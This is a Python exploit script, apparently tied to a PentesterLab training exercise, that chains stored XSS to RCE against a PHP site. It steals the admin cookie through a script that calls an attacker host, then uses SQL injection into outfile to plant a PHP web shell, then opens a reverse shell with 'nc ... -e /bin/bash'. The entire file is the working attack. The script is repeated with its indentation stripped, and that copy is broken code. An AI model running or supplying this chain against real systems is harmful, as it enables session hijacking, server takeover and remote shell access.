cyberheartmi9/XSS-To-RCE.py

## XSS-To-RCE.py
import requests
import socket
import sys
import random
import string


banner="""

██   ██ ███████ ███████     ████████  ██████      ██████   ██████ ███████
 ██ ██  ██      ██             ██    ██    ██     ██   ██ ██      ██
  ███   ███████ ███████        ██    ██    ██     ██████  ██      █████
 ██ ██       ██      ██        ██    ██    ██     ██   ██ ██      ██
██   ██ ███████ ███████        ██     ██████      ██   ██  ██████ ███████


        @intx0x80
        https://pentesterlab.com/exercises/xss_and_mysql_file/course


"""

host="0.0.0.0"
port=80
adminsess=requests.Session()

proxies={"http":"127.0.0.1:8080"}

def send_comments(ip,lhost):
    #
    data={"title":"PW","author":"guest","text":f"<script>document.write('<img src=http://{lhost}/'+document.cookie+' />');</script>","submit":"Submit"}
    req=requests.post(f"http://{ip}//post_comment.php?id=1",data=data,allow_redirects=False)
    if req.status_code==302:
        return True


def server(host,lport):
        #
        so = socket.socket()
        so.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        so.bind((host,lport))
        so.listen()

        print("[*] Server Running...")
        (handler, conn) = so.accept()
        data = handler.recv(4096)
        cookies=data.split(b"HTTP")[0][5:].decode("UTF-8")
        return cookies.split("=")[1]


def SQLinj(ip,admincookie,filename):
     #
     adminsess.cookies.set("PHPSESSID",str(admincookie))

     url=f"http://{ip}/admin/edit.php?id=-1%20union%20select%201,%27%3C?php%20system($_GET[\\%27cmd\\%27]);%20?%3E%27,3,4%20into%20outfile%20%27/var/www/images/{filename}.php%27"
     req=adminsess.get(url)
     req2=requests.get(f"http://{ip}//images/{filename}.php")
     if req2.status_code==200:
          return True


def reverse_shelll(ip,filename,lhost,lport):
     #
     url=f"http://{ip}/images/{filename}.php?cmd=nc+{lhost}+{lport}+-e+/bin/bash"
     requests.get(url)


def main():
    if len(sys.argv) != 4:
        print(banner)
        print ("(+) usage: %s <target>   <LHOST>  <LPORT> "  % sys.argv[0])
        print ('(+) eg: %s 172.17.0.2 172.17.0.2 443'  % sys.argv[0])
        sys.exit(-1)


    print(banner)
    ip=sys.argv[1]
    lhost=sys.argv[2]
    filename=''.join(random.choice(string.ascii_letters) for _ in range(5))
    lport=int(sys.argv[3])

    if send_comments(ip,lhost):
        cookie=server(host,port)
        if SQLinj(ip,cookie,filename):
            print("[+] Check your Listener :) ")
            reverse_shelll(ip,filename,lhost,lport)

            #print(cookie)


if __name__ == "__main__":
    main()
	import requests
	import socket
	import sys
	import random
	import string



	banner="""

	██ ██ ███████ ███████ ████████ ██████ ██████ ██████ ███████
	██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
	███ ███████ ███████ ██ ██ ██ ██████ ██ █████
	██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
	██ ██ ███████ ███████ ██ ██████ ██ ██ ██████ ███████



	@intx0x80
	https://pentesterlab.com/exercises/xss_and_mysql_file/course



	"""

	host="0.0.0.0"
	port=80
	adminsess=requests.Session()

	proxies={"http":"127.0.0.1:8080"}

	def send_comments(ip,lhost):
	#
	data={"title":"PW","author":"guest","text":f"<script>document.write('<img src=http://{lhost}/'+document.cookie+' />');</script>","submit":"Submit"}
	req=requests.post(f"http://{ip}//post_comment.php?id=1",data=data,allow_redirects=False)
	if req.status_code==302:
	return True



	def server(host,lport):
	#
	so = socket.socket()
	so.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	so.bind((host,lport))
	so.listen()

	print("[*] Server Running...")
	(handler, conn) = so.accept()
	data = handler.recv(4096)
	cookies=data.split(b"HTTP")[0][5:].decode("UTF-8")
	return cookies.split("=")[1]


	def SQLinj(ip,admincookie,filename):
	#
	adminsess.cookies.set("PHPSESSID",str(admincookie))

	url=f"http://{ip}/admin/edit.php?id=-1%20union%20select%201,%27%3C?php%20system($_GET[\\%27cmd\\%27]);%20?%3E%27,3,4%20into%20outfile%20%27/var/www/images/{filename}.php%27"
	req=adminsess.get(url)
	req2=requests.get(f"http://{ip}//images/{filename}.php")
	if req2.status_code==200:
	return True




	def reverse_shelll(ip,filename,lhost,lport):
	#
	url=f"http://{ip}/images/{filename}.php?cmd=nc+{lhost}+{lport}+-e+/bin/bash"
	requests.get(url)









	def main():
	if len(sys.argv) != 4:
	print(banner)
	print ("(+) usage: %s <target> <LHOST> <LPORT> " % sys.argv[0])
	print ('(+) eg: %s 172.17.0.2 172.17.0.2 443' % sys.argv[0])
	sys.exit(-1)



	print(banner)
	ip=sys.argv[1]
	lhost=sys.argv[2]
	filename=''.join(random.choice(string.ascii_letters) for _ in range(5))
	lport=int(sys.argv[3])

	if send_comments(ip,lhost):
	cookie=server(host,port)
	if SQLinj(ip,cookie,filename):
	print("[+] Check your Listener :) ")
	reverse_shelll(ip,filename,lhost,lport)

	#print(cookie)



	if __name__ == "__main__":
	main()